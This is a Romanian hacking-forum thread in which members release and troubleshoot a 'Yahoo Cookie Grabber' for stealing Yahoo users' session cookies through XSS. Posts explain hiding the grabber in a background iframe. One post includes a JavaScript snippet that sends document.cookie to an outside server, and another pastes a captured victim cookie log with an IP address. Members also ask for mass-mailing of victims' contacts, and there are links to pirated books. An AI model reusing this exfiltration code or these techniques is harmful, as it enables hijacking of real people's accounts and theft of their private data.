[RST] Professional Yahoo Cookie Grabber [de actualitate]

[katmai]

pentru totzi cei care pun intrebari CITITZI CU ATENTZIE :

ACEST TOOL ESTE FACUT PENTRU CEI DEJA FAMILIARIZATI CU XSS SI ATACURI XSS IN SPECIAL DE YAHOO. ACEST TOOL NU ESTE UN TOOL DE GENUL CLICK SI AI COOKIEUL VICTIMEI CI ESTE DOAR UN TOOL CARE II VA FACE MUNCA USOARA ATACATORULUI PRIN DECODAREA DE COOKIE SI LINKURI UTILE.

CONCLUZIE : NU STITI CE INSEAMNA XSS SAU SA LANSATI ATACURI XSS ACEST TOOL NU VA ESTE UTIL.

Cred ca ar trebuii pus pe prima pagina asta,sa intelegi o data.Si acuma ma doare in cot daca va suparati pe mine,voi incercati sa furati cookie cuiva fara cunostinte,de programare,javascript,xss, nici macar minime,si dupa aia sa ii arati la unu ca iai furat cookie si ala sa faca plecaciuni in fata ta!!!!Acest om se numeste RATAT : CAUTATI PE GOOGLE DESPRE XSS,despre JavaScript.

V-am facut update la doua carti sub forma de pdf.

Syngress.Cross.Site.Scripting.Attacks.Xss.Exploits.and.Defense.May.2007

DOWNLOAD

http://rapidshare.com/files/81405173/Syngress.Cross.Site.Scripting.Attacks.Xss.Exploits.and.Defense.May.2007.pdf.html

XSS Attacks

DOWNLOAD

http://rapidshare.com/files/81405810/XSS_Attacks.pdf.html

[catalyn1178]

Deci e aceasi metoda, victima trebuie sa dea click pe link?

Daca gandeai mai mult de 5 sec,iti trecea prin cap sa pui prin iframe..

Dooh, daca taceai, filozof ramaneai.

Reformulez, noua versiune aduce ceva revolutionar, sau e doar o simpla cosmetizare a vechii metode?

[michee]

@katmai: alea 2 nu-s una si ac. carte?

[Scofilds]

ar fi super daca ne-ati da si noua optiunea - prelungirea duratei de functionare a cookieurilor pentru a inlatura limita de 24 ore si mass mail in lista de contacte

[Guest Nemessis]

ar fi super daca ne-ati da si noua optiunea - prelungirea duratei de functionare a cookieurilor pentru a inlatura limita de 24 ore si mass mail in lista de contacte

Sau ar fi super daca mi-as aduce aminte de cine are ban pe forum si si-a facut alt user. Termina cu prostiile.

[unu23456]

Deci e aceasi metoda, victima trebuie sa dea click pe link?

Daca gandeai mai mult de 5 sec,iti trecea prin cap sa pui prin iframe..

Din cauza functiei escape(document.cookie) sau poate a serverului ( imi dau si eu cu parerea nu zic ca e asa sigur ) grabberul cu toate ca primea cookieul nu il parsa asa ca l-am pus sa parseze $_SERVER["HTTP_REFERER"] si a fost totul ok . Poti sa imi explici si mie cu iframe-ul ala te rog ? Nu mai trebuie click ? devine un fel de csrf ?

[tw8]

Poti sa imi explici si mie cu iframe-ul ala te rog ?

iframe e folosit pentru a incarca grabber-ul in fundal, in timp ce tu ii afisezi userului o alta pagina. Citeste mai multe despre asta aici.

Cookie este "transat" pentru a da doar valorile Y si T. Un atacator nu poate sa trimita in grabber niciun script pentru ca nu ar trece de "transarea" cookieului.

Nu chiar, se poate injecta foarte bine JS. La "Language" nu poate fi injectat JS pentru ca transforma toate caracterele in caractere mari, iar JS este case-sensitive.

2. chiar daca victima afla unde e grabberul trebe sa treaca de referer test ca sa poata injecta cookie malformat in el

Big deal . Folosesti CookieEditor, editez cookie-ul da lal Yahoo! punand JS in ZipCode, si apoi intri normal. Refer-ul va fi corect si injectarea codului va functiona.

incercatzi sa va folositzi mintea inainte de a face posturi ratate si tu si vladiii

dupa o zi de release si deja nu va mai sufar cu intrebarile si posturile idioate ... parerea mea e ca mai bine nu il lansam si gata

Ti se pare idiot sa vorbesc despre securitate pe un forum de securitate ?

Oricum, hai sa incercam sa trecem peste asta. Consider subiectul incheiat.

[Guest Nemessis]

Multumim tw8. Intelege si tu ca BanKai are mai multe roluri pe RST. Unul ca developer si celalalt ca sa incinga spiritele. Isi indeplineste indatoririle foarte bine dupa cum vezi.

O sa se corecteze bug-urile in versiunea urmatoare. Nu ne-am dat interesul la posibilitatea de backfire pentru ca principalul scop a fost sa incepem upgradarea clasicelor grabbere.

[Guest BanKai]

cu cateva minute inainte de prima plangere referitoare la xss in grabbed.html discutam cu kwe despre un vuln raportat de cineva cum ca ar fi un xss permanent in adminul de pe php bb si ne miram cum sa cauti si sa faci publi astfel de vuln ... cand el e useless ... daca esti admin la ce iti tre xss ... cam aceeasi duda este aici ... dar noah e un bug si btw scrie design by a2head ... stiti ce inseamna asta ? inseamna ca grabbed.html afisheaza ce a vrut a2head sa afiseze ...

[unu23456]

Poti sa imi explici si mie cu iframe-ul ala te rog ?

iframe e folosit pentru a incarca grabber-ul in fundal, in timp ce tu ii afisezi userului o alta pagina. Citeste mai multe despre asta aici.

Stiu ce e ala un iframe si cum se foloseste , eu (am vrut cel putin ) intreb cum dreacu incarci iframe-ul ala in yahoo si faci xss-ul sa fie executat in frame-ul ala.

[Guest BanKai]

mai ce nu intelegeti ... aici nu discutam metoda xss ci doar grabberul ... sa raspund la intrebarea ta ... nu nu mai exista metoda automatizata de cookie stealing la yahoo ... ultima a fost descoperita de mine si de neme acum 3-4 luni si a stat la vip vreo 3 saptamani pana a fost patchuita din cauza lu mozi care a scapat'o pe mirc ...

[i0nu7z]

ma baeti mah,

eu n-am inteles ce vreti voi sa ziceti cu function init() ala ..cum adica nu mai merge?!

Deci eu folosesc graberul vechi cu javascriptu asta:

function init() { new Image().src='http://www.site.com/sdsphp?cookie='+escape(document.cookie); } window.onload=init; si grabberul lui kwerln

si merge struna... pe toate tipurile de browsere IE6, IE7 , Opera 9.2 , Firefox ultima versiune..inclusiv pe mail beta cat si pe versiunea veche de yahoo.

Acum am schimbat grabberul ... l`am pus pe cel nou si merge la fel de bine!

rezultatele sunt chiar spectaculoase!

In finalul acestui post tin sa mentionez urmatoarele:

multumiri lui Bankai, Nemessis, kw3rln, slick, si toti cei care au contribuit la automatizarea grabberului. Mi-ati dat idei ... acum lucrez si eu la o versiune a mea .. sper sa imi reuseasca ... ptr ca as dorii sa adaug si eu cateva chestii..

Mult noroc staff-ului RST si spor in toate proiectele voastre

....am plecat sa ard un Pall Mall ... ciao

[Scofilds]

Bankai vreau sa te intreb o chestie ... aseara nu am inteles un lucru deci vreau sa pun pe un site graberu asta asa adika pe el sa fie scam care sa intre astia e si pe situ meu .. care il am sa fie grabberul.html sa vad de pe site la mine nu de pe hostu cu scam se poate daca da te rog ajutama

apropo scoate offlinu

[Guest BanKai]

nu e offline e ignore si grabber.php trebuie sa fie pe acelasi host cu grabbed.html

[Guest Nemessis]

function init din public cookie loggerul existent pe rst nu mai functioneaza. Ceva e busit la script probabil. Ma refer la acest cookie logger http://rstcenter.com/index.php?pagina=cookie_logger

[michee]

abia azi am reusit sa-l testez and it works like a charm:)

Excellent work boys!!!Thanks again for sharing!

[grunter]

Bravo baieti! sunteti cei mai tari ar trebuie sa fiti sponsorizati

[michee]

ah, am uitat ceva.

Acolo in index e setata functia X cu steinterval la 5 secunde si apoi urmeaza un if.....nu cumva if-ul ala trebuia sa vina inainte de setInterval?Cred ca asta ati vrut sa faceti.

[Danny]

Dupa lupte seculare ... am reusit! Am combinat grabberu vechi a lu Slick shi ceva din asta nou, si merge! Si pe IE, si pe Opera si pe Mozilla! Ms baieti si scuze daca v-am enervat Trebuie sa fiti mai rabdatori cu incepatorii

EDIT

E naspa ca nu intotdeauna imi vine Y shi T .. imi vin cateodata alte chestii, inafara de Y si T

Pe mozilla vine Y shi T, pe IE6 nu vine Y si T ...

Exemplu

>> Received from 86.124.193.178 on 6.01.2008 at 8:04am <<
B=4dcr7j93kt37u&b=3&s=13; F=a=2WHkSp0MvT8Cy97c2AxBvNZ7rkozh2ecYAyfyfDtWZ5HcAGXFX.7CB2RSgxr6k.5Moe1yNE-&b=0iCd; PH=fn=g1KUIe.1is3esf6OLQ--&l=en-US; C=mg=1; CP=v=70008&br=i&pc=none; U=mt=C7zgg52MhYqRYLglmX20W0fFKEswKcgDe0Oy_A--&ux=4wegHB&un=e0af4q52iisll; LYC=l_v=0&l_lv=10&l_s=tq311xy0x2uyu1z3yw30st4543uzxw1u&l_um=0_0_1_0_0; D=_ylh=X3oDMTFmbW12azlmBF9TAzI3MTYxNDkEcGlkAzExOTk2OTkwMjQEdGVzdAN2MTAxBHRtcGwDdjEwMS1s

[Guest BanKai]

misterioase sunt caile domnului

[Danny]

Stie careva totusi de ce nu vine shi Y cu T ?

[Guest Nemessis]

Stie careva totusi de ce nu vine shi Y cu T ?

Pentru ca ai combinat cele 2 grabbere ))))) ESTI CULMEA!

[Danny]

Pai ma .. din 2 grabbere ... am facut unu bun .. adica pe grabberu lu kw3 nu venea deloc de pe IE ... am luat grabberu asta a lu Slick si pe asta vine .. dar nu vine Y shi T Maree bataie de cap shi cu XSSu asta uof uof

[Guest Nemessis]

Totusi uita-te putin la ce se scrie pe aici. Tu esti singurul care are probleme. Nu pricepi ca undeva gresesti? Ai folosit noul google_adsense.php? Fara referer?

[Danny]

Nu Stiu ca eu gresesc pe undeva ... de aia va tot stresez, incercand sa-mi dau seama unde gresesc. De unde iau noul google_adsense.php ?